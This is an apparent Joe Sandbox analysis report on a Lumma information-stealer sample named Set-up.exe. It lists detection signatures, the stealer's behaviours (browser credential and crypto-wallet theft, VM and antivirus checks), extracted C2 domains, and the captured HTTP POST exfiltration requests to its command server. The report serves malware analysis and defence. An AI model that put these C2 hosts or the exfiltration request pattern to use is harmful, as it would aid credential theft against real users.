Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1589443
MD5:7a7570c5afc5bf3d53854f4ae9e61457
SHA1:f58e3ef793b096e088438eb4df373294bf95c09b
SHA256:3ab888d4b341b936543bb6d48504a4530c27466c4a40b0705ef3dba5a5326b6d
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Set-up.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 7A7570C5AFC5BF3D53854F4AE9E61457)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["spookycappy.biz", "fraggielek.biz", "grandiouseziu.biz", "marketlumpe.biz", "nuttyshopr.biz", "littlenotii.biz", "rampnatleadk.click", "punishzement.biz", "truculengisau.biz"], "Build id": "error--end"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1841233829.0000000000DDB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1910418761.0000000000B60000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x50f3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
        00000000.00000003.1840272460.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Set-up.exe PID: 7104JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: Set-up.exe PID: 7104JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 1 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-12T15:20:13.124090+010020283713Unknown Traffic192.168.2.449732172.67.139.144443TCP
              2025-01-12T15:20:14.615838+010020283713Unknown Traffic192.168.2.449733172.67.139.144443TCP
              2025-01-12T15:20:15.818900+010020283713Unknown Traffic192.168.2.449734172.67.139.144443TCP
              2025-01-12T15:20:17.106777+010020283713Unknown Traffic192.168.2.449735172.67.139.144443TCP
              2025-01-12T15:20:18.280695+010020283713Unknown Traffic192.168.2.449736172.67.139.144443TCP
              2025-01-12T15:20:21.757785+010020283713Unknown Traffic192.168.2.449737172.67.139.144443TCP
              2025-01-12T15:20:23.442162+010020283713Unknown Traffic192.168.2.449741172.67.139.144443TCP
              2025-01-12T15:20:26.618370+010020283713Unknown Traffic192.168.2.449745172.67.139.144443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-12T15:20:14.149231+010020546531A Network Trojan was detected192.168.2.449732172.67.139.144443TCP
              2025-01-12T15:20:15.116755+010020546531A Network Trojan was detected192.168.2.449733172.67.139.144443TCP
              2025-01-12T15:20:27.974091+010020546531A Network Trojan was detected192.168.2.449745172.67.139.144443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-12T15:20:14.149231+010020498361A Network Trojan was detected192.168.2.449732172.67.139.144443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-12T15:20:15.116755+010020498121A Network Trojan was detected192.168.2.449733172.67.139.144443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-12T15:20:17.580047+010020480941Malware Command and Control Activity Detected192.168.2.449735172.67.139.144443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: marketlumpe.bizAvira URL Cloud: Label: malware
              Source: nuttyshopr.bizAvira URL Cloud: Label: malware
              Source: https://rampnatleadk.click/(8YAvira URL Cloud: Label: malware
              Source: https://rampnatleadk.click/apil7Avira URL Cloud: Label: malware
              Source: grandiouseziu.bizAvira URL Cloud: Label: malware
              Source: https://rampnatleadk.click/Avira URL Cloud: Label: malware
              Source: https://rampnatleadk.click/apiC8YgAvira URL Cloud: Label: malware
              Source: https://rampnatleadk.click/:3ODrAvira URL Cloud: Label: malware
              Source: https://rampnatleadk.click/apiAvira URL Cloud: Label: malware
              Source: littlenotii.bizAvira URL Cloud: Label: malware
              Source: https://rampnatleadk.click/apiKAvira URL Cloud: Label: malware
              Source: https://rampnatleadk.click/I8XlAvira URL Cloud: Label: malware
              Source: https://rampnatleadk.click:443/apiAvira URL Cloud: Label: malware
              Source: https://rampnatleadk.click/9Avira URL Cloud: Label: malware
              Source: rampnatleadk.clickAvira URL Cloud: Label: malware
              Source: spookycappy.bizAvira URL Cloud: Label: malware
              Source: truculengisau.bizAvira URL Cloud: Label: malware
              Source: fraggielek.bizAvira URL Cloud: Label: malware
              Source: punishzement.bizAvira URL Cloud: Label: malware
              Source: https://rampnatleadk.click/apizAvira URL Cloud: Label: malware
              Found malware configuration
              Source: Set-up.exe.7104.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["spookycappy.biz", "fraggielek.biz", "grandiouseziu.biz", "marketlumpe.biz", "nuttyshopr.biz", "littlenotii.biz", "rampnatleadk.click", "punishzement.biz", "truculengisau.biz"], "Build id": "error--end"}
              Multi AV Scanner detection for submitted file
              Source: Set-up.exeVirustotal: Detection: 7%Perma Link
              Source: Set-up.exeReversingLabs: Detection: 13%
              Source: Set-up.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49745 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 172.67.139.144:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 172.67.139.144:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 172.67.139.144:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.139.144:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49735 -> 172.67.139.144:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 172.67.139.144:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: spookycappy.biz
              Source: Malware configuration extractorURLs: fraggielek.biz
              Source: Malware configuration extractorURLs: grandiouseziu.biz
              Source: Malware configuration extractorURLs: marketlumpe.biz
              Source: Malware configuration extractorURLs: nuttyshopr.biz
              Source: Malware configuration extractorURLs: littlenotii.biz
              Source: Malware configuration extractorURLs: rampnatleadk.click
              Source: Malware configuration extractorURLs: punishzement.biz
              Source: Malware configuration extractorURLs: truculengisau.biz
              Source: Joe Sandbox ViewIP Address: 172.67.139.144 172.67.139.144
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.139.144:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.139.144:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.139.144:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.139.144:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.139.144:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.139.144:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.139.144:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 172.67.139.144:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rampnatleadk.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: rampnatleadk.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3XEH7KGCEF7JXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18135Host: rampnatleadk.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FISV8E7XMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8732Host: rampnatleadk.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LN94D6SCN5NTAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20409Host: rampnatleadk.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=57E1C7PTPJW6B8194RNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1409Host: rampnatleadk.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KVHPB4STMIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549671Host: rampnatleadk.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 84Host: rampnatleadk.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: rampnatleadk.click
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rampnatleadk.click
              Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Set-up.exe, 00000000.00000002.1910542741.0000000000DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.
              Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Set-up.exeString found in binary or memory: http://gcc.gnu.org/bugs.html):
              Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Set-up.exe, 00000000.00000003.1807390746.0000000003F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Set-up.exe, 00000000.00000003.1807390746.0000000003F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Set-up.exe, 00000000.00000003.1807390746.0000000003F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: Set-up.exe, 00000000.00000003.1852213854.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1910542741.0000000000DAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/
              Source: Set-up.exe, 00000000.00000002.1910542741.0000000000D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/(8Y
              Source: Set-up.exe, 00000000.00000003.1835478387.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1834001627.0000000003F06000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805472670.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805998934.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1833979280.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806263294.0000000003F06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/9
              Source: Set-up.exe, 00000000.00000002.1910795263.0000000000DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/:3ODr
              Source: Set-up.exe, 00000000.00000002.1910795263.0000000000DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/I8Xl
              Source: Set-up.exe, 00000000.00000003.1852213854.0000000000DE2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852213854.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806237333.0000000003F10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/api
              Source: Set-up.exe, 00000000.00000003.1833921663.0000000003F0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/apiC8Yg
              Source: Set-up.exe, 00000000.00000003.1794559739.0000000003F0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/apiK
              Source: Set-up.exe, 00000000.00000003.1841233829.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1864166986.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1857255847.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852213854.0000000000DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/apil7
              Source: Set-up.exe, 00000000.00000003.1833921663.0000000003F0A000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806991177.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805384068.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851850249.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805882594.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1864327284.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1909389621.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1911159958.0000000003F12000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1840080903.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806237333.0000000003F10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click/apiz
              Source: Set-up.exe, 00000000.00000003.1805472670.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1864394306.0000000000DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rampnatleadk.click:443/api
              Source: Set-up.exe, 00000000.00000003.1782712260.0000000003F62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Set-up.exe, 00000000.00000003.1794627775.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782851723.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1783081057.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782712260.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1794468638.0000000003F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: Set-up.exe, 00000000.00000003.1782851723.0000000003F34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: Set-up.exe, 00000000.00000003.1794627775.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782851723.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1783081057.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782712260.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1794468638.0000000003F59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: Set-up.exe, 00000000.00000003.1782851723.0000000003F34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Set-up.exeString found in binary or memory: https://www.freetype.org/ttfautohint
              Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 172.67.139.144:443 -> 192.168.2.4:49732 version: TLS 1.2
